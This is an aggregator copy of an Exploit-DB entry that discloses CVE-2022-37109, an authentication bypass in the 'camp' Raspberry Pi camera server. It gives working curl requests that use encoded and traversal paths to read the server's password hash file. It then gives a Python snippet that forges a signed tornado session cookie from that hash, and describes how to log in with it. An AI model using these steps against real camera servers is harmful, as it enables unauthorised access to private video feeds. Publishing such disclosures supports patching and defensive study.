2
[webapps] "camp" Raspberry Pi camera server 1.0 - Authentication Bypa...
source link: https://www.exploit-db.com/exploits/51041
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
"camp" Raspberry Pi camera server 1.0 - Authentication Bypass
# Exploit Title: "camp" Raspberry Pi camera server 1.0 - Authentication Bypass
# Date: 2022-07-25
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/patrickfuller
# Software Link: https://github.com/patrickfuller/camp
# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-37109
"camp" Raspberry Pi camera server Authentication Bypass vulnerability
https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904
1. Start an instance of the "camp" server:
python3 server.py --require-login
2. Fetch the SHA-512 password hash using one of these methods:
curl http://localhost:8000/static/password.tx%74
OR
curl http://localhost:8000/static/./password.txt --path-as-is
OR
curl http://localhost:8000/static/../camp/password.txt --path-as-is
3. Execute the following python snippet (replace the hash with the hash you received in step 2).
from tornado.web import create_signed_value
import time
print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))
4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK